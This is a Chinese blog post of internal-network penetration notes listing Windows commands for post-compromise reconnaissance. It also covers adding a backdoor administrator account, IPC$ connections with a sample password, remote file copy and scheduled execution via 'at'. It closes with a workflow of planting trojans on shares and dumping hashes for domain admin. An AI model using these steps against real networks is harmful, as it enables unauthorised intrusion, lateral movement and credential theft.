【内网渗透笔记】常用系统命令 您所在的位置:网站首页 win10提权命令 【内网渗透笔记】常用系统命令

【内网渗透笔记】常用系统命令

2023-07-08 09:30| 来源: 网络整理| 查看: 265

【内网渗透笔记】常用系统命令

 

信息收集

 

set ----- 查看系统环境变量 whoami -----查询当前的用户账号 ipconfig /all -----查看本机的IP地址 net user -----本机用户列表 net user test test /add -----添加用户 net localgroup administrators test /add -----账户提升为管理员权限 net localgroup administrators -----查看某个用户组的详细信息,包括其注释、用户组的成员等 systeminfo -----查看系统信息 winver -----检查Windows详细版本 tasklist /svc -----查看有哪些进程 netstat -ano ----- 查看有哪些网络连接端口 net use \\ip\ipc$ pawword /user:username -----建立IPC会话net user /domain ------ 查询域用户 net view /domain ------ 查询域列表 net view /domain:domainname ------ 查看workgroup域中计算机列表 net group "domain admins" /domain -----查看域管理员 net user administrator(域用户) /domain -----获取域某用户的详细信息 net view ------ 查询同一域内机器列表 arp -a -----查看本地存储的arp地址数据

net view \\ip ------ 查询某IP共享 net group /domain ------ 查询域里面的工作组 net group "Domain Controllers" /domain -----查看域控制器 net localgroup administrators /domain ------ 登录本机的域管理员 net localgroup administrators workgroup\user001 /add ------域用户添加到本机 net time /domain ------ 判断主域,主域服务器都做时间服务器 net config workstation ------ 当前登录域

小技巧:

1、tasklist /svc 查看服务,找到PID,然后通过netstat –ano 找到PID对应的端口

C:\>tasklist /svc //找到 TermService对应PID为1128 svchost.exe 1128 TermService C:\>netstat -ano Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 688 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 424 TCP 0.0.0.0:3399 0.0.0.0:0 LISTENING 1128 //确认3399为远程端口

2、内网C段存活主机查找

for /l %i in (1,1,255) do @ping 10.9.10.%i -w 1 -n 1 | find /i "ttl" //来自 10.9.10.1 的回复: 字节=32 时间=4ms TTL=61

 3、域服务器

  一般情况下,域服务器跟DNS服务器都是同一台机器,

nbtstat 命令  nbtstat -a test.com

ping 命令      ping test.com

4、IPC$连接

net use \\10.9.10.201\ipc$ abc123! /user:administrator net use \\10.9.10.201\ipc$ abc123! /user:test.com\administrator net use * /del /yes copy 111.txt \\10.9.10.201\admin$ net time \\10.9.10.201 at \\10.9.10.201 1:40 111.txt

5、内网渗透流程

A、获取一台服务器权限,通过这台服务器进行内网信息收集,如有几个域,域管理员账号,域内共享。

B、有共享可考虑通过共享写入木马,接着上传抓HASH工具,抓取本地HASH,获取到域管理员administrator账号

 

 

 

 

抓hash工具

 

参考文章:

https://zhuanlan.zhihu.com/p/22710907

http://www.360doc.com/content/16/0411/13/11559041_549701109.shtml

https://mp.weixin.qq.com/s?__biz=MzI2NzU2MjMxOA==&mid=2247483838&idx=1&sn=4c3954b87da4231181caeba5e4422ae1&chksm=eafdbd9fdd8a34899132cda3c31fc1d881dc2ad706670ceea50c7a00e349dda50b3f84cfe1af&mpshare=1&scene=23&srcid=0108ZSYb3IwJ3ShUu5Y9QNti#rd

 



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

      专题文章
        CopyRight 2018-2019 实验室设备网 版权所有